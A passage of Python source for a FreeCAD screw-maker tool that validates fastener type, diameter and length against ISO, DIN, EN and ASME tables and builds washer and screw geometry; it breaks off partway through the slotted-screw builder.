self.SymbolThread.setText(_translate("ScrewMaker", "Symbol Thread (not implemented yet)", None))
self.RealThread.setText(
_translate("ScrewMaker", "Real Thread (takes time, memory intensive)\nMay not work for all screws!", None))
self.MessageLabel.setText(_translate("ScrewMaker", "Select your screw type", None))
self.MessageLabel.setProperty("Errortext", _translate("ScrewMaker", "Combination not implemented", None))
self.MessageLabel.setProperty("OK_text", _translate("ScrewMaker", "Screw is made", None))
self.CreateButton.setText(_translate("ScrewMaker", "create", None))
def guiCheck_Data(self):
ST_text = str(self.ScrewType.currentText())
ST_text = ST_text.split(':')[0]
ND_text = str(self.NominalDiameter.currentText())
NL_text = str(self.NominalLength.currentText())
M_text, self.ScrewAvailable = self.theScrew.check_Data(ST_text, ND_text, NL_text)
self.MessageLabel.setText(_translate("ScrewMaker", M_text, None))
def guiCreateScrew(self):
# self.simpThread = self.SimpleScrew.isChecked()
# self.symThread = self.SymbolThread.isChecked()
# self.rThread = self.RealThread.isChecked()
if self.SimpleScrew.isChecked():
threadType = 'simple'
if self.SymbolThread.isChecked():
threadType = 'symbol'
if self.RealThread.isChecked():
threadType = 'real'
ND_text = str(self.NominalDiameter.currentText())
NL_text = str(self.NominalLength.currentText())
ST_text = str(self.ScrewType.currentText())
ST_text = ST_text.split(':')[0]
if ST_text in ('ScrewTap', 'ScrewDie', 'ThreadedRod'):
if NL_text == 'User':
textValue = self.UserLen.property("text")
stLength = FreeCAD.Units.parseQuantity(textValue).Value
NL_text = str(stLength)
myObj = self.theScrew.createScrew(ST_text, ND_text, NL_text, threadType)
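# Screw is the geometry engine behind the dialog above: check_Data() validates a
# screw type / diameter / length combination against the FsData tables, and
# createScrew() builds the shape and, unless shapeOnly is set, adds it to the
# active document as a Part::Feature.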
class Screw:
def __init__(self):
self.objAvailable = True
self.Tuner = 510
# thread scaling for 3D printers
# scaled_diam = diam * ScaleA + ScaleB
self.sm3DPrintMode = False
self.smNutThrScaleA = 1.0
self.smNutThrScaleB = 0.0
self.smScrewThrScaleA = 1.0
self.smScrewThrScaleB = 0.0
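# Illustrative sketch (assumption, not used directly here): with sm3DPrintMode
# enabled the factors above are meant to be applied wherever the nominal thread
# diameter is resolved, roughly
#   nut thread:   dia = dia * smNutThrScaleA   + smNutThrScaleB
#   screw thread: dia = dia * smScrewThrScaleA + smScrewThrScaleB
# presumably inside getDia(), which is defined elsewhere in this file.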
def check_Data(self, ST_text, ND_text, NL_text):
# FreeCAD.Console.PrintMessage("Data checking" + NL_text + "\n")
# set screw not ok
self.objAvailable = False
M_text = "Select your screw type"
Type_text = ''
if ST_text == 'ISO4017':
table = FsData["iso4017head"]
tab_len = FsData["iso4017length"]
tab_range = FsData["iso4017range"]
Type_text = 'Screw'
if ST_text == 'EN1662':
table = FsData["en1662def"]
tab_len = FsData["en1662length"]
tab_range = FsData["en1662range"]
Type_text = 'Screw'
if ST_text == 'EN1665':
table = FsData["en1665def"]
tab_len = FsData["en1665length"]
tab_range = FsData["en1665range"]
Type_text = 'Screw'
if ST_text == 'ISO2009':
table = FsData["iso2009def"]
tab_len = FsData["iso2009length"]
tab_range = FsData["iso2009range"]
Type_text = 'Screw'
if ST_text == 'ISO2010':
table = FsData["iso2009def"]
tab_len = FsData["iso2009length"]
tab_range = FsData["iso2009range"]
Type_text = 'Screw'
if ST_text == 'ISO4762':
table = FsData["iso4762def"]
tab_len = FsData["iso4762length"]
tab_range = FsData["iso4762range"]
Type_text = 'Screw'
if ST_text == 'ISO10642':
table = FsData["iso10642def"]
tab_len = FsData["iso10642length"]
tab_range = FsData["iso10642range"]
Type_text = 'Screw'
if ST_text == 'ISO4014':
table = FsData["iso4014head"]
tab_len = FsData["iso4014length"]
tab_range = FsData["iso4014range"]
Type_text = 'Screw'
if ST_text == 'ISO1207':
table = FsData["iso1207def"]
tab_len = FsData["iso1207length"]
tab_range = FsData["iso1207range"]
Type_text = 'Screw'
if ST_text == 'ISO1580':
table = FsData["iso1580def"]
tab_len = FsData["iso2009length"]
tab_range = FsData["iso2009range"]
Type_text = 'Screw'
if ST_text == 'ISO7045':
table = FsData["iso7045def"]
tab_len = FsData["iso7045length"]
tab_range = FsData["iso7045range"]
Type_text = 'Screw'
if ST_text == 'ISO7046':
table = FsData["iso7046def"] # contains only cross recess data
tab_len = FsData["iso7045length"]
tab_range = FsData["iso7046range"]
Type_text = 'Screw'
if ST_text == 'ISO7047':
table = FsData["iso2009def"]
tab_len = FsData["iso7045length"]
tab_range = FsData["iso7046range"]
Type_text = 'Screw'
if ST_text == 'ISO7048':
table = FsData["iso7048def"]
tab_len = FsData["iso7048length"]
tab_range = FsData["iso7048range"]
Type_text = 'Screw'
if ST_text == 'ISO7380-1':
table = FsData["iso7380def"]
tab_len = FsData["iso7380length"]
tab_range = FsData["iso7380range"]
Type_text = 'Screw'
if ST_text == 'ISO7380-2':
table = FsData["iso7380_2def"]
tab_len = FsData["iso7380length"]
tab_range = FsData["iso7380range"]
Type_text = 'Screw'
if ST_text == 'DIN967':
table = FsData["din967def"]
tab_len = FsData["din967length"]
tab_range = FsData["din967range"]
Type_text = 'Screw'
if ST_text == 'ISO14579':
table = FsData["iso14579def"]
tab_len = FsData["iso14579length"]
tab_range = FsData["iso14579range"]
Type_text = 'Screw'
if ST_text == 'ISO14580':
table = FsData["iso14580def"]
tab_len = FsData["iso14580length"]
tab_range = FsData["iso1207range"]
Type_text = 'Screw'
if ST_text == 'ISO14583':
table = FsData["iso14583def"]
tab_len = FsData["iso7045length"]
tab_range = FsData["iso7046range"]
Type_text = 'Screw'
if ST_text == 'ISO14584':
table = FsData["iso14584def"]
tab_len = FsData["iso7045length"]
tab_range = FsData["iso14584range"]
Type_text = 'Screw'
if ST_text == 'ISO14582':
table = FsData["iso14582def"]
tab_len = FsData["iso14582length"]
tab_range = FsData["iso14582range"]
Type_text = 'Screw'
if ST_text == 'ISO7089':
table = FsData["iso7089def"]
Type_text = 'Washer'
if ST_text == 'ISO7090':
table = FsData["iso7090def"]
Type_text = 'Washer'
if ST_text == 'ISO7091':
table = FsData["iso7091def"]
Type_text = 'Washer'
if ST_text == 'ISO7092':
table = FsData["iso7092def"]
Type_text = 'Washer'
if ST_text == 'ISO7093-1':
table = FsData["iso7093def"]
Type_text = 'Washer'
if ST_text == 'ISO7094':
table = FsData["iso7094def"]
Type_text = 'Washer'
if (ST_text == 'ISO4026') or (ST_text == 'ISO4027') or (ST_text == 'ISO4029'):
table = FsData["iso4026def"]
tab_len = FsData["iso4026length"]
tab_range = FsData["iso4026range"]
Type_text = 'Screw'
if ST_text == 'ISO4028':
table = FsData["iso4028def"]
tab_len = FsData["iso4028length"]
tab_range = FsData["iso4028range"]
Type_text = 'Screw'
if ST_text == 'ISO4032':
table = FsData["iso4032def"]
Type_text = 'Nut'
if ST_text == 'ISO4033':
table = FsData["iso4033def"]
Type_text = 'Nut'
if ST_text == 'ISO4035':
table = FsData["iso4035def"]
Type_text = 'Nut'
if ST_text == 'ISO4036':
table = FsData["iso4036def"]
Type_text = 'Nut'
if ST_text == 'EN1661':
table = FsData["en1661def"]
Type_text = 'Nut'
if ST_text == 'DIN7984':
table = FsData["din7984def"]
tab_len = FsData["din7984length"]
tab_range = FsData["din7984range"]
Type_text = 'Screw'
if ST_text == 'DIN6912':
table = FsData["din6912def"]
tab_len = FsData["din6912length"]
tab_range = FsData["din6912range"]
Type_text = 'Screw'
if ST_text == 'iso7379':
table = FsData["iso7379def"]
tab_len = FsData["iso7379length"]
tab_range = FsData["iso7379range"]
Type_text = 'Screw'
if ST_text == 'ASMEB18.2.1.6':
table = FsData["asmeb18.2.1.6def"]
tab_len = FsData["asmeb18.2.1.6length"]
tab_range = FsData["asmeb18.2.1.6range"]
Type_text = 'Screw'
if ST_text == 'ASMEB18.2.1.8':
table = FsData["asmeb18.2.1.8def"]
tab_len = FsData["inch_fs_length"]
tab_range = FsData["asmeb18.2.1.8range"]
Type_text = 'Screw'
if ST_text == 'ASMEB18.2.2.1A':
table = FsData["asmeb18.2.2.1adef"]
Type_text = 'Nut'
if ST_text == 'ASMEB18.2.2.4A':
table = FsData["asmeb18.2.2.4def"]
Type_text = 'Nut'
if ST_text == 'ASMEB18.2.2.4B':
table = FsData["asmeb18.2.2.4def"]
Type_text = 'Nut'
if ST_text == 'ASMEB18.3.1A':
table = FsData["asmeb18.3.1adef"]
tab_len = FsData["inch_fs_length"]
tab_range = FsData["asmeb18.3.1arange"]
Type_text = 'Screw'
if ST_text == 'ASMEB18.3.3A':
table = FsData["asmeb18.3.3adef"]
tab_len = FsData["inch_fs_length"]
tab_range = FsData["asmeb18.3.3arange"]
Type_text = 'Screw'
if ST_text == 'ASMEB18.3.3B':
table = FsData["asmeb18.3.3bdef"]
tab_len = FsData["inch_fs_length"]
tab_range = FsData["asmeb18.3.3brange"]
Type_text = 'Screw'
if ST_text == 'ASMEB18.3.4':
table = FsData["asmeb18.3.4def"]
tab_len = FsData["inch_fs_length"]
tab_range = FsData["asmeb18.3.4range"]
Type_text = 'Screw'
if ST_text[:-1] == 'ASMEB18.3.5':
table = FsData["asmeb18.3.5def"]
tab_len = FsData["inch_fs_length"]
tab_range = FsData["asmeb18.3.5range"]
Type_text = 'Screw'
if ST_text == 'ASMEB18.5.2':
table = FsData["asmeb18.5.2def"]
tab_len = FsData["inch_fs_length"]
tab_range = FsData["asmeb18.5.2range"]
Type_text = 'Screw'
if ST_text == 'ASMEB18.6.3.1A':
table = FsData["asmeb18.6.3.1adef"]
tab_len = FsData["inch_fs_length"]
tab_range = FsData["asmeb18.6.3.1arange"]
Type_text = 'Screw'
if ST_text[:-1] == 'ASMEB18.21.1.12':
table = FsData["asmeb18.21.1.12def"]
Type_text = 'Washer'
if ST_text == 'ScrewTap':
table = FsData["tuningTable"]
Type_text = 'Screw-Tap'
if ST_text == 'ScrewDie':
table = FsData["tuningTable"]
Type_text = 'Screw-Die'
if ST_text == 'ThreadedRod':
table = FsData["tuningTable"]
Type_text = 'Threaded-Rod'
if ND_text not in table:
ND_min, ND_max = FsData["standard_diameters"][ST_text]
M_text = ST_text + ' has diameters from ' + ND_min + ' to ' + ND_max + ' and not ' + ND_text + '!'
self.objAvailable = False
# set screw not ok
else:
if Type_text == 'Screw':
# NL_text = str(self.NominalLength.currentText())
NL_min, NL_max = tab_range[ND_text]
NL_min_float = self.getLength(NL_min)
NL_max_float = self.getLength(NL_max)
if NL_text == 'User':
M_text = 'User length is only available for screw taps, dies and threaded rods!'
self.objAvailable = False
else:
NL_text_float = self.getLength(NL_text)
if (NL_text_float < NL_min_float) or (NL_text_float > NL_max_float) or (NL_text not in tab_len):
if '(' in ND_text:
ND_text = ND_text.lstrip('(').rstrip(')')
M_text = ST_text + '-' + ND_text + ' has lengths from ' + NL_min + ' to ' + NL_max + ' and not ' + NL_text + '!'
self.objAvailable = False
# set screw not ok
else:
if '(' in ND_text:
ND_text = ND_text.lstrip('(').rstrip(')')
M_text = ST_text + '-' + ND_text + 'x' + NL_text + ' is available in the library!'
self.objAvailable = True
# set screw ok
else: # Washers and Nuts
if Type_text not in ('Screw-Tap', 'Screw-Die', 'Threaded-Rod'):
if '(' in ND_text:
ND_text = ND_text.lstrip('(').rstrip(')')
M_text = ST_text + '-' + ND_text + ' is available in the library!'
self.objAvailable = True
# set washer/nut ok
else:
if NL_text == 'User':
M_text = 'Screw tap, die or threaded rod with user length is ok!'
self.objAvailable = True
else:
# NL_text = str(self.NominalLength.currentText())
if '(' in ND_text:
ND_text = ND_text.lstrip('(').rstrip(')')
M_text = ST_text + '-' + ND_text + ' with ' + NL_text + ' mm length is available in the library!'
self.objAvailable = True
# set screwTap ok
# print "Data checking: ", self.NominalLength.currentText(), "\n"
# FreeCAD.Console.PrintMessage("Set Check_result into text " + str(self.objAvailable) + M_text + "\n")
return M_text, self.objAvailable
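# Typical use, mirroring guiCheck_Data()/guiCreateScrew() above (sketch; the
# type/diameter/length strings are examples only):
#   worker = Screw()
#   msg, ok = worker.check_Data('ISO4017', 'M6', '25')
#   if ok:
#       worker.createScrew('ISO4017', 'M6', '25', 'simple')
# createScrew() only builds anything if a preceding check_Data() call has set
# objAvailable to True.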
def createScrew(self, ST_text, ND_text, NL_text, threadType, shapeOnly=False):
# self.simpThread = self.SimpleScrew.isChecked()
# self.symThread = self.SymbolThread.isChecked()
# self.rThread = self.RealThread.isChecked()
if threadType == 'real':
self.rThread = True
else:
self.rThread = False
if self.objAvailable:
try:
# first we check if valid numbers have been entered
# FreeCAD.Console.PrintMessage("NominalLength: " + self.NominalLength.currentText() + "\n")
# FreeCAD.Console.PrintMessage("NominalDiameter: " + self.NominalDiameter.currentText() + "\n")
# FreeCAD.Console.PrintMessage("SimpleThread: " + str(self.SimpleScrew.isChecked()) + "\n")
# FreeCAD.Console.PrintMessage("SymbolThread: " + str(self.SymbolThread.isChecked()) + "\n")
# FreeCAD.Console.PrintMessage("RealThread: " + str(self.RealThread.isChecked()) + "\n")
# ND_text = str(self.NominalDiameter.currentText())
# NL_text = str(self.NominalLength.currentText())
# ST_text = str(self.ScrewType.currentText())
# ST_text = ST_text.split(':')[0]
# dia = float(ND_text.lstrip('M'))
l = self.getLength(NL_text)
if ST_text == 'ISO4017':
table = FsData["iso4017head"]
if ST_text == 'ISO4014':
table = FsData["iso4014head"]
if ST_text == 'EN1662':
table = FsData["en1662def"]
if ST_text == 'EN1665':
table = FsData["en1665def"]
if ST_text == 'ISO2009':
table = FsData["iso2009def"]
if ST_text == 'ISO2010':
table = FsData["iso2009def"]
if ST_text == 'ISO4762':
table = FsData["iso4762def"]
if ST_text == 'ISO10642':
table = FsData["iso10642def"]
if ST_text == 'ISO1207':
table = FsData["iso1207def"]
if ST_text == 'ISO1580':
table = FsData["iso1580def"]
if ST_text == 'ISO7045':
table = FsData["iso7045def"]
if ST_text == 'ISO7046':
table = FsData["iso7045def"]
if ST_text == 'ISO7047':
table = FsData["iso7045def"]
if ST_text == 'ISO7048':
table = FsData["iso7048def"]
if ST_text == 'ISO7380-1':
table = FsData["iso7380def"]
if ST_text == 'ISO7380-2':
table = FsData["iso7380_2def"]
if ST_text == 'DIN967':
table = FsData["din967def"]
if ST_text == 'ISO14579':
table = FsData["iso14579def"]
if ST_text == 'ISO14580':
table = FsData["iso14580def"]
if ST_text == 'ISO14582':
table = FsData["iso14582def"]
if ST_text == 'ISO14583':
table = FsData["iso14583def"]
if ST_text == 'ISO14584':
table = FsData["iso14584def"]
if ST_text == 'ISO7089':
table = FsData["iso7089def"]
if ST_text == 'ISO7090':
table = FsData["iso7090def"]
if ST_text == 'ISO7091':
table = FsData["iso7091def"]
if ST_text == 'ISO7092':
table = FsData["iso7092def"]
if ST_text == 'ISO7093-1':
table = FsData["iso7093def"]
if ST_text == 'ISO7094':
table = FsData["iso7094def"]
if ST_text == 'ISO4026':
table = FsData["iso4026def"]
if ST_text == 'ISO4027':
table = FsData["iso4026def"]
if ST_text == 'ISO4028':
table = FsData["iso4028def"]
if ST_text == 'ISO4029':
table = FsData["iso4026def"]
if ST_text == 'ISO4032':
table = FsData["iso4032def"]
if ST_text == 'ISO4033':
table = FsData["iso4033def"]
if ST_text == 'ISO4035':
table = FsData["iso4035def"]
if ST_text == 'ISO4036':
table = FsData["iso4036def"]
if ST_text == 'EN1661':
table = FsData["en1661def"]
if ST_text == 'DIN7984':
table = FsData["din7984def"]
if ST_text == 'DIN6912':
table = FsData["din6912def"]
if ST_text == 'ISO7379':
table = FsData["iso7379def"]
if ST_text == 'ASMEB18.2.1.6':
table = FsData["asmeb18.2.1.6def"]
if ST_text == 'ASMEB18.2.1.8':
table = FsData["asmeb18.2.1.8def"]
if ST_text == 'ASMEB18.2.2.1A':
table = FsData["asmeb18.2.2.1adef"]
if ST_text[:-1] == 'ASMEB18.2.2.4':
table = FsData["asmeb18.2.2.4def"]
if ST_text == 'ASMEB18.3.1A':
table = FsData["asmeb18.3.1adef"]
if ST_text == 'ASMEB18.3.2':
table = FsData["asmeb18.3.2def"]
if ST_text == 'ASMEB18.3.3A':
table = FsData["asmeb18.3.3adef"]
if ST_text == 'ASMEB18.3.3B':
table = FsData["asmeb18.3.3bdef"]
if ST_text == 'ASMEB18.3.4':
table = FsData["asmeb18.3.4def"]
if ST_text[:-1] == 'ASMEB18.3.5':
table = FsData["asmeb18.3.5def"]
if ST_text == 'ASMEB18.6.3.1A':
table = FsData["asmeb18.6.3.1adef"]
if ST_text == 'ASMEB18.5.2':
table = FsData["asmeb18.5.2def"]
if ST_text[:-1] == 'ASMEB18.21.1.12':
table = FsData["asmeb18.21.1.12def"]
if (ST_text == 'ScrewTap') or (ST_text == 'ScrewDie') or (ST_text == 'ThreadedRod'):
table = FsData["tuningTable"]
if ND_text not in table:
FreeCAD.Console.PrintMessage("Combination of type " + ST_text \
+ " and diameter " + ND_text + " not available!" + "\n")
# self.MessageLabel.setText(_translate("ScrewMaker", "not implemented", None))
except ValueError:
# print "Error! nom_dia and length values must be valid numbers!"
FreeCAD.Console.PrintMessage("Error! nom_dia and length values must be valid numbers!\n")
else:
doc = FreeCAD.activeDocument()
done = False
if ST_text == 'ISO4014' or ST_text == 'ISO4017' or ST_text == 'ASMEB18.2.1.6':
screw = self.makeIso4017_2(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'EN1662' or ST_text == 'EN1665' or ST_text == 'ASMEB18.2.1.8':
screw = self.makeEN1662_2(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO2009' or ST_text == 'ISO2010' or \
ST_text == 'ISO1580' or ST_text == 'ASMEB18.6.3.1A':
screw = self.makeSlottedScrew(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO4762' or ST_text == 'ISO14579' or ST_text == 'DIN7984' or \
ST_text == 'DIN6912' or ST_text == 'ASMEB18.3.1A':
screw = self.makeIso4762(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO1207' or ST_text == 'ISO14580' or ST_text == 'ISO7048':
screw = self.makeIso1207(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO7045' or ST_text == 'ISO14583':
screw = self.makeIso7045(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO7046' or ST_text == 'ISO7047' or \
ST_text == 'ISO14582' or ST_text == 'ISO14584' or \
ST_text == 'ISO10642' or ST_text == 'ASMEB18.3.2':
screw = self.makeIso7046(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO7380-1' or ST_text == 'ISO7380-2' or \
ST_text == 'DIN967' or ST_text == 'ASMEB18.3.3A' or \
ST_text == 'ASMEB18.3.3B':
screw = self.makeIso7380(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO7379' or ST_text == 'ASMEB18.3.4':
screw = self.makeIso7379(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO7089' or ST_text == 'ISO7090' or ST_text == 'ISO7093-1' or \
ST_text == 'ISO7091' or ST_text == 'ISO7092' or ST_text == 'ISO7094' or \
ST_text[:-1] == 'ASMEB18.21.1.12':
screw = self.makeIso7089(ST_text, ND_text)
Type_text = 'Washer'
done = True
if ST_text == 'ISO4026' or ST_text == 'ISO4027' or \
ST_text == 'ISO4028' or ST_text == 'ISO4029' or \
ST_text[:-1] == 'ASMEB18.3.5':
screw = self.makeIso4026(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO4032' or ST_text == 'ISO4033' or \
ST_text == 'ISO4035' or ST_text == 'ASMEB18.2.2.1A' or \
ST_text[:-1] == 'ASMEB18.2.2.4':
screw = self.makeIso4032(ST_text, ND_text)
Type_text = 'Nut'
done = True
if ST_text == 'ASMEB18.5.2':
screw = self.makeCarriageBolt(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'EN1661':
screw = self.makeEN1661(ND_text)
Type_text = 'Nut'
done = True
if ST_text == 'ScrewTap':
screw = self.makeScrewTap(ND_text, l)
Type_text = 'Screw-Tap'
done = True
if ST_text == 'ScrewDie':
screw = self.makeScrewDie(ND_text, l)
Type_text = 'Screw-Die'
done = True
if ST_text == 'ThreadedRod':
# NOTE: 'pitch' is not defined anywhere in this method; a thread pitch value
# for the rod has to be supplied here for this branch to work.
screw = self.makeThreadedRod(ND_text, l, pitch)
Type_text = 'Threaded-Rod'
done = True
if not done:
FreeCAD.Console.PrintMessage("No valid Screw Type!" + "\n")
if '(' in ND_text:
ND_text = ND_text.lstrip('(').rstrip(')')
if Type_text == 'Screw':
label = ST_text + "-" + ND_text + "x" + NL_text + "_"
else:
if Type_text == 'Nut':
label = ST_text + '-' + ND_text + '_'
else:
if Type_text in ('Screw-Tap', 'Screw-Die', 'Threaded-Rod'):
label = ST_text + '-' + ND_text + 'x' + NL_text + '_'
else: # washer
label = ST_text + '-' + ND_text.lstrip('M') + '_'
if shapeOnly:
return screw
ScrewObj = doc.addObject("Part::Feature")
ScrewObj.Label = label
ScrewObj.Shape = screw
# FreeCAD.Console.PrintMessage("Placement: "+ str(ScrewObj.Placement) +"\n")
# FreeCAD.Console.PrintMessage("The label: "+ label +"\n")
self.moveScrew(ScrewObj)
# ScrewObj.Label = label
doc.recompute()
# Part.show(screw)
return ScrewObj
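# moveScrew() aligns a freshly created fastener with the current GUI selection:
# it picks up the centre and axis of a selected circular edge (or the axis of a
# selected face / the position of a selected vertex) and adjusts the object's
# Placement so the screw is rotated onto that axis and moved to that point.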
def moveScrew(self, ScrewObj_m):
# FreeCAD.Console.PrintMessage("In Move Screw: " + str(ScrewObj_m) + "\n")
mylist = FreeCAD.Gui.Selection.getSelectionEx()
if len(mylist) == 1:
# check selection
# FreeCAD.Console.PrintMessage("Selections: " + str(mylist.__len__()) + "\n")
Pnt1 = None
Axis1 = None
Axis2 = None
for o in Gui.Selection.getSelectionEx():
# for s in o.SubElementNames:
# FreeCAD.Console.PrintMessage( "name: " + str(s) + "\n")
for s in o.SubObjects:
# FreeCAD.Console.PrintMessage( "object: "+ str(s) + "\n")
if hasattr(s, "Curve"):
# FreeCAD.Console.PrintMessage( "The Object is a Curve!\n")
if hasattr(s.Curve, "Center"):
"""
FreeCAD.Console.PrintMessage( "The object has a Center!\n")
FreeCAD.Console.PrintMessage( "Curve attribute. "+ str(s.__getattribute__('Curve')) + "\n")
FreeCAD.Console.PrintMessage( "Center: "+ str(s.Curve.Center) + "\n")
FreeCAD.Console.PrintMessage( "Axis: "+ str(s.Curve.Axis) + "\n")
"""
Pnt1 = s.Curve.Center
Axis1 = s.Curve.Axis
if hasattr(s, 'Surface'):
# print 'the object is a face!'
if hasattr(s.Surface, 'Axis'):
Axis1 = s.Surface.Axis
if hasattr(s, 'Point'):
# FreeCAD.Console.PrintMessage( "the object seems to be a vertex! "+ str(s.Point) + "\n")
Pnt1 = s.Point
if Axis1 is not None:
# FreeCAD.Console.PrintMessage( "Got Axis1: " + str(Axis1) + "\n")
Axis2 = Base.Vector(0.0, 0.0, 1.0)
Axis2_minus = Base.Vector(0.0, 0.0, -1.0)
# Calculate angle
if Axis1 == Axis2:
normvec = Base.Vector(1.0, 0.0, 0.0)
result = 0.0
else:
if Axis1 == Axis2_minus:
normvec = Base.Vector(1.0, 0.0, 0.0)
result = math.pi
else:
normvec = Axis1.cross(Axis2) # Calculate axis of rotation = normvec
normvec.normalize() # Normalize for quaternion calculations
# normvec_rot = normvec
result = DraftVecUtils.angle(Axis1, Axis2, normvec)  # angle calculation
sin_res = math.sin(result / 2.0)
cos_res = math.cos(result / 2.0)
normvec.multiply(-sin_res) # Calculation of the quaternion elements
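# (axis-angle to quaternion: vector part = rotation axis * sin(angle/2),
#  scalar part = cos(angle/2))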
# FreeCAD.Console.PrintMessage( "Angle = "+ str(math.degrees(result)) + "\n")
# FreeCAD.Console.PrintMessage("Normal vector: "+ str(normvec) + "\n")
pl = FreeCAD.Placement()
pl.Rotation = (normvec.x, normvec.y, normvec.z, cos_res)  # rotation quaternion
# FreeCAD.Console.PrintMessage("pl mit Rot: "+ str(pl) + "\n")
# neuPlatz = Part2.Object.Placement.multiply(pl)
neuPlatz = ScrewObj_m.Placement
# FreeCAD.Console.PrintMessage("the Position "+ str(neuPlatz) + "\n")
neuPlatz.Rotation = pl.Rotation.multiply(ScrewObj_m.Placement.Rotation)
neuPlatz.move(Pnt1)
# FreeCAD.Console.PrintMessage("the rot. Position: "+ str(neuPlatz) + "\n")
# make Washer
def makeIso7089(self, SType='ISO7089', ThreadType='M6'):
dia = self.getDia(ThreadType, True)
# FreeCAD.Console.PrintMessage("the disc with dia: " + str(dia) + "\n")
if SType == 'ISO7089':
d1_min, d2_max, h, h_max = FsData["iso7089def"][ThreadType]
if SType == 'ISO7090':
d1_min, d2_max, h, h_max = FsData["iso7090def"][ThreadType]
if SType == 'ISO7091':
d1_min, d2_max, h, h_max = FsData["iso7091def"][ThreadType]
if SType == 'ISO7092':
d1_min, d2_max, h, h_max = FsData["iso7092def"][ThreadType]
if SType == 'ISO7093-1':
d1_min, d2_max, h, h_max = FsData["iso7093def"][ThreadType]
if SType == 'ISO7094':
d1_min, d2_max, h, h_max = FsData["iso7094def"][ThreadType]
if SType == 'ASMEB18.21.1.12A':
d1_min, d2_a, d2_b, d2_c, h_a, h_b, h_c = FsData["asmeb18.21.1.12def"][ThreadType]
d2_max = d2_a
h_max = h_a
if SType == 'ASMEB18.21.1.12B':
d1_min, d2_a, d2_b, d2_c, h_a, h_b, h_c = FsData["asmeb18.21.1.12def"][ThreadType]
d2_max = d2_b
h_max = h_b
if SType == 'ASMEB18.21.1.12C':
d1_min, d2_a, d2_b, d2_c, h_a, h_b, h_c = FsData["asmeb18.21.1.12def"][ThreadType]
d2_max = d2_c
h_max = h_c
# FreeCAD.Console.PrintMessage("the disc with d1_min: " + str(d1_min) + "\n")
# Washer Points
Pnt0 = Base.Vector(d1_min / 2.0, 0.0, h_max)
Pnt2 = Base.Vector(d2_max / 2.0, 0.0, h_max)
Pnt3 = Base.Vector(d2_max / 2.0, 0.0, 0.0)
Pnt4 = Base.Vector(d1_min / 2.0, 0.0, 0.0)
if SType == 'ISO7090':
Pnt1 = Base.Vector(d2_max / 2.0 - h_max / 4.0, 0.0, h_max)
Pnt2 = Base.Vector(d2_max / 2.0, 0.0, h_max * 0.75)
edge1 = Part.makeLine(Pnt0, Pnt1)
edgeCham = Part.makeLine(Pnt1, Pnt2)
edge1 = Part.Wire([edge1, edgeCham])
else:
edge1 = Part.makeLine(Pnt0, Pnt2)
edge2 = Part.makeLine(Pnt2, Pnt3)
edge3 = Part.makeLine(Pnt3, Pnt4)
edge4 = Part.makeLine(Pnt4, Pnt0)
# FreeCAD.Console.PrintMessage("Edges made Pnt2: " + str(Pnt2) + "\n")
aWire = Part.Wire([edge1, edge2, edge3, edge4])
# Part.show(aWire)
aFace = Part.Face(aWire)
head = aFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# FreeCAD.Console.PrintMessage("Washer revolved: " + str(dia) + "\n")
return head
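# All the make*() builders below follow the same pattern as the washer above:
# build half of the cross-section as a wire of lines and arcs in the XZ plane,
# revolve it 360 degrees around the Z axis, cut away the recess (slot, cross,
# hex socket, hexalobular) and, when self.rThread is set, replace the plain
# shank faces with a modelled thread shell from makeShellthread().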
# make ISO 2009 Slotted countersunk flat head screws
# make ISO 2010 Slotted raised countersunk head screws
# make ISO 1580 Pan head slotted screw (Code is nearly identical to iso1207)
def makeSlottedScrew(self, SType='ISO1580', ThreadType='M6', l=25.0):
dia = self.getDia(ThreadType, False)
if SType == 'ISO1580':
# FreeCAD.Console.PrintMessage("the head with l: " + str(l) + "\n")
# P, a, b, dk, dk_mean, da, k, n_min, r, t_min, x = iso1580def[ThreadType]
P, a, b, dk_max, da, k, n_min, r, rf, t_min, x = FsData["iso1580def"][ThreadType]
# FreeCAD.Console.PrintMessage("the head with iso: " + str(dk_max) + "\n")
ht = k
headEnd = r
# Length for calculation of head fillet
sqrt2_ = 1.0 / math.sqrt(2.0)
r_fil = rf
beta = math.radians(5.0) # angle of pan head edge
alpha = math.radians(90.0 - (90.0 + 5.0) / 2.0)
tan_beta = math.tan(beta)
# top head diameter without fillet
rK_top = dk_max / 2.0 - k * tan_beta
fillet_center_x = rK_top - r_fil + r_fil * tan_beta
fillet_center_z = k - r_fil
fillet_arc_x = fillet_center_x + r_fil * math.sin(alpha)
fillet_arc_z = fillet_center_z + r_fil * math.cos(alpha)
# FreeCAD.Console.PrintMessage("rK_top: " + str(rK_top) + "\n")
if b > l - 1.0 * P:
bmax = l - 1.0 * P
else:
bmax = b
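# i.e. bmax = min(b, l - P): keep at least one pitch of unthreaded shank
# between the head and the start of the thread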
# Head Points
Pnt0 = Base.Vector(0.0, 0.0, k)
Pnt2 = Base.Vector(fillet_center_x, 0.0, k)
Pnt3 = Base.Vector(fillet_arc_x, 0.0, fillet_arc_z)
Pnt4 = Base.Vector(fillet_center_x + r_fil * math.cos(beta), 0.0, fillet_center_z + r_fil * math.sin(beta))
Pnt5 = Base.Vector(dk_max / 2.0, 0.0, 0.0)
Pnt6 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
Pnt7 = Base.Vector(dia / 2.0 + r - r * sqrt2_, 0.0, -r + r * sqrt2_) # arc-point of fillet
# Pnt8 = Base.Vector(dia/2.0,0.0,-r) # end of fillet
PntR = Base.Vector(dia / 2.0, 0.0, -r) # end of fillet
PntT0 = Base.Vector(0.0, 0.0, -r) # helper point for real thread
edge1 = Part.makeLine(Pnt0, Pnt2)
edge2 = Part.Arc(Pnt2, Pnt3, Pnt4).toShape()
edge3 = Part.makeLine(Pnt4, Pnt5)
